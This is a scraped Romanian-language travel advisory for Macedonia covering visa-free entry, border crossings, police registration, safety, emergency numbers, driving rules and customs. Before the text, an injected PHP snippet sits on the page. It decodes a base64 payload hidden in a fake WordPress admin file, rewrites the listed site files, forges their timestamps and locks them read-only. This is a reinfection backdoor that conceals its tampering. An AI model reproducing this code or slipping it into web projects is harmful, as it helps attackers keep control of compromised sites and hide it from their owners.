$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Macedonia – O noua atitudine

Condiţii de intrare şi regim de şedere

Cetăţenii români nu au nevoie de viză de intrare în Republica Macedonia pentru călătorii de scurtă şedere, până la 90 de zile, într-un interval de 6 luni de la data primei intrări.
Intrarea fără viză pe teritoriul Republicii Macedonia a cetăţenilor români se face pe baza cărţii de identitate sau a paşaportului valabil.

Puncte de trecere frontieră:

  • Serbia: Blace, Volkovo, Jazince, Pelince, Sopot si Tabanovce
  • Bulgaria: Deve Bair, Delcevo si Novo Selo
  • Grecia: Bogorodica, Gevgelija, Dojran si Medzitlija
  • Albania: Kafasan, Sveti Naum, Stenje si Blato
  • Aeroporturi: Skopje si Ohrid

Atragem atenţia cetăţenilor români asupra obligativităţii ca, în termen de 24 de ore de la intrarea în Macedonia, să se înregistreze la Poliţia pentru străini/Secţia de poliţie din localitatea respectivă. Acest lucru este valabil cu precădere în situaţia în care cetăţenii români locuiesc la persoane particulare.

În situaţia cazării la hotel această responsabilitate este preluată de recepţia unităţii hoteliere.
Legea privind regimul străinilor nu prevede explicit pedepse pentru cazurile de nerespectare a regimului înregistrării şederii cetăţenilor străini în Republica Macedonia. În practică se constată însă că, în cazul nerespectării acestui regim, persoanele vinovate sunt reţinute şi expulzate într-o perioada de 1 pana la 10 zile de la data reţinerii, la care se adaugă amenda contravenţională (circa 300 euro) şi interzicerea intrării pe teritoriul Republicii Macedonia între 6 şi 12 luni.

Ministerul Afacerilor Externe recomandă cetăţenilor români care intenţionează să rămână pentru o perioadă îndelungată pe teritoriul acestui stat să se adreseze misiunii diplomatice a României şi să îşi anunţe prezenţa în regiune, comunicând coordonatele personale pentru a putea fi contactaţi în situaţii de urgenţă.

Ameninţări teroriste  

Pe teritoriul Republicii Macedonia nu au fost semnalate activităţi ale unor organizaţii şi grupuri teroriste care să vizeze sistematic străinii aflaţi pe teritoriul acestei ţări. Cu toate acestea, cetăţenii români trebuie sa aibă în vedere riscurile globale pe care fenomenul terorist le poate produce oriunde in lume.

Siguranţă şi criminalitate

În lunile aprilie şi mai 2012 au avut loc demonstraţii, în nordul şi estul ţării. MAE recomandă insistent cetăţenilor români să evite locurile unde au loc largi reuniuni publice sau alte acţiuni de protest.

Manifestări şi adunări cu caracter politic continuă să fie organizate în timpul verii în numeroase localităţi din ţară; totodată se constată proliferarea demonstraţiilor spontane, neanunţate, organizate prin intermediul reţelelor de socializare. În condiţiile în care acţiunile de protest persistă, asemenea zone pot deveni periculoase, iar manifestaţiile pot degenera rapid în confruntări stradale.

Cetăţenilor români li se recomandă să manifeste precauţie pe timpul deplasărilor în Macedonia pentru a nu face obiectul unor implicări nedorite, accidentale, în evenimente generate de manifestaţiile locale.

În Macedonia rata criminalităţii este relativ redusă şi, rareori criminalitatea sau alte fapte antisociale sunt îndreptate asupra turiştilor.

Recomandări generale:

  • Păstraţi în locuri sigure documentele şi valorile personale, biletele de călătorie, banii şi cărţile de credit şi nu le expuneţi în mod vizibil asupra dumneavoastră sau în maşini.
  • Maşinile trebuie încuiate şi asigurate cu sisteme de alarmă.
  • În cazul călătoriei cu autobuzul sau trenul păstraţi atenţia asupra bagajelor şi lucrurilor personale pe întreaga durată a călătoriei.

În cazul unor incidente grave (accidente, tâlhării), care necesită intervenţia imediată a autorităţilor, trebuie apelate următoarele numere de urgenţă:

  • Politie: 192
  • Pompieri: 193
  • Salvare: 194
  • Tractări auto/ asistenţă rutieră AMSM: 196
  • Informaţii: 188

În cazul unor incidente care afectează siguranţa persoanei sau a bunurilor, vă recomandăm contactarea poliţiei locale şi a Ambasadei României la Skopje.

Pierderea/furtul banilor si documentelor se reclamă la Secţia de poliţie aflată în zona în care s-a produs evenimentul. După eliberarea documentului de călătorie de către Secţia consulară, cetăţeanul român trebuie să se prezinte la Secţia de poliţie care i-a eliberat dovada pierderii paşaportului pentru aplicarea vizei de ieşire.

Sistemul medical 

Vă recomandăm să vă încheiaţi, înainte de plecare, o asigurare de călătorie. Aceasta are valabilitate în toate ţările şi poate să acopere de la riscurile de bază (îmbolnăviri, accidente, urgenţe stomatologice, repatriere sanitară sau în caz de deces) până la toate riscurile de călătorie, inclusiv pierderea/ furtul/ deteriorarea bagajelor, anularea plecării în străinătate, falimentul companiei aeriene etc.
Sistemul medical are două componente: de stat şi privat. În sistemul privat accesul este nelimitat, contra cost.
Pentru asistenţă medicală gratuită este necesară asigurarea medicală încheiată la firmele autorizate înainte de efectuarea călătoriei.

Condiţii privind traficul auto

La punctele de trecere a frontierei, autorităţile macedonene solicită pe lângă certificatul de înregistrare a maşinii, cartea verde a autoturismului valabilă pentru Macedonia (nu este suficient numai pentru Uniunea Europeana) şi asigurarea internaţională de sănătate.
Se percep taxe de autostradă, în numerar la puncte special amenajate pe parcursul drumului. Taxa se poate efectua şi într-o monedă de circulaţie internaţională, fapt pentru care recomandăm turiştilor să posede mărunt.
De evitat încheierea unor asigurări auto în sistem electronic, care nu sunt recunoscute în Republica Macedonia.
Contravenţiile la regimul de circulaţie pe drumurile publice sunt între 150 – 300 euro (de regulă se aplica 300 euro), redusă la jumătate dacă se plăteşte in 24 de ore. Atenţie: se reţine documentul de identitate (de regula paşaportul) până la achitarea contravenţiei.

  • Transportul public

În Republica Macedonia, cel mai dezvoltat sector de transport, este cel rutier. Autobuzele asigură legăturile între aproape toate localităţile. În oraşe transportul public este asigurat, de asemenea, cu autobuze.

  • Limitele de viteză admise

Viteza legala maxima este de 60 km/h in localităţi, 80 km/h in afara localităţilor, 100 km/h pe şosele regionale si 120 km/h pe autostrăzi.

  • Centura de siguranţă

Centura de siguranţă este obligatorie.

  • Permisul de conducere

Permisul de conducere românesc este recunoscut pe teritoriul Macedoniei pe toata durata de valabilitate.

  • Informaţii privind cazurile de accidente de circulaţie

Accidentele de orice fel trebuie semnalate la cea mai apropiata secţie de politie, iar autoturismele trebuie să rămână in poziţia avută după momentul producerii coliziunii, până la sosirea agentului de circulaţie.

Utilizarea cărţilor de credit

În Macedonia sunt acceptate cărţile de credit cu valabilitate internaţională (de ex. Visa, Mastercard etc.), acestea putând fi utilizate pentru plata bunurilor achiziţionate şi a serviciilor prestate pe teritoriul Macedoniei.

Regimul medicamentelor

Medicamentele pot fi introduse în Republica Macedonia numai în baza reţetelor, fişelor de externare din spital sau alte documente în care este precizat diagnosticul şi se prescrie tratamentul medicamentos.

Regimul animalelor de companie

Animalele de companie pot fi introduse în Republica Macedonia în baza unor dovezi privind starea de sănătate şi situaţia vaccinărilor eliberate în ţara de domiciliu.


Reglementări vamale

Atât bunurile, cât şi sumele în valută trebuie declarate la intrarea în Republica Macedonia. Pe teritoriul acestui stat, este permis importul şi exportul de valută, fără declaraţie vamală, în limita a 10.000 euro.
Potrivit reglementarilor locale, sumele de bani trebuie declarate în scris, pe baza de declaraţie vamală, iar lucrătorii vamali trebuie să elibereze dovezi în acest sens.
Este interzisă introducerea în Republica Macedonia de droguri, alte tipuri de substanţe similare, armament, muniţie, substanţe toxice sau radioactive.

Sursa: www.mae.ro

By o9admin